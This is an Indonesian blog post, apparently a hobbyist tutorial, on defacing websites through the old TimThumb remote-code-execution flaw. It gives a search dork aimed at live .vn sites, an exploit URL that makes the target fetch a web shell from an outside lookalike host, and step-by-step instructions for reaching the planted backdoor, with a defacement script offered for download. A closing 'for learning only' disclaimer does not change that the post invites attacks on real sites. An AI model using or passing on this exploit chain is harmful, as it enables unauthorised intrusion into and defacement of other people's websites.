--> Skip to main content

Cara Deface Website Menggunakan Exploit Timthumb RCE

Assalamualaikum Wr.Wb
Berjumpa lagi denagan saya Fahmi-O'Conner
Udah sangat lama kayaknya saya tidak buat tutorial baru, Maklum kemaren baru ngumpulin uang untuk beli Domain baru "hehehe"


Jadi pada kesempatan kali ini kita bakalan belajar tutorial deface baru nih, Sebenarnya ini adalah Exploit lama sobat, Tapi tidak ada salahnya kalau ini saya ajarkan kepada anda :V
Dork : inurl:/timthumb.php site:vn
Exploit : ?src=http://flickr.com.tukangpompajakarta.com/shell.php
Deface Script : [DOWNLOAD]
Lengkapi peralatan yang di butuhkan di atas, Jika sudah barulah kita bisa untuk melanjutkan tutorialnya :D
  • Seperti biasa gan, Cari target kita dengan Dork yang saya sediakan di atas (Pakai live target sendiri juga boleh)
  • Pilih salah satu target dan jangan lupa untuk menambahkan Exploit ini "timthum.php" di belakang Domain target, Contoh : http://target.vn/timthum.php (Ciri-ciri vuln versinya itu di bawah 1.32)
  • Sekarang kita coba masukkan Exploit di atas seperti ini http://target.vn/timthum.php/?src=http://flickr.com.tukangpompajakarta.com/shell.php, Jika vuln akan terdapat sebuah link untuk mengakses Shell kamu.
  • Sekarang tinggal kalian akses saja Shell Backdoornya dengan link yang sudah di berikan  
Peringatan : Tutorial ini hanya untuk menambah ilmu pengetahuan saja, Jadi gunakanlah dengan bijak!..

Warning : This tutorial is only for learning, so use it wisely

Terimakasih tlah membaca artikel ini, Semoga besok adalah hari kebruntungan mu kawan ^_^
Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
Buka Komentar
Tutup Komentar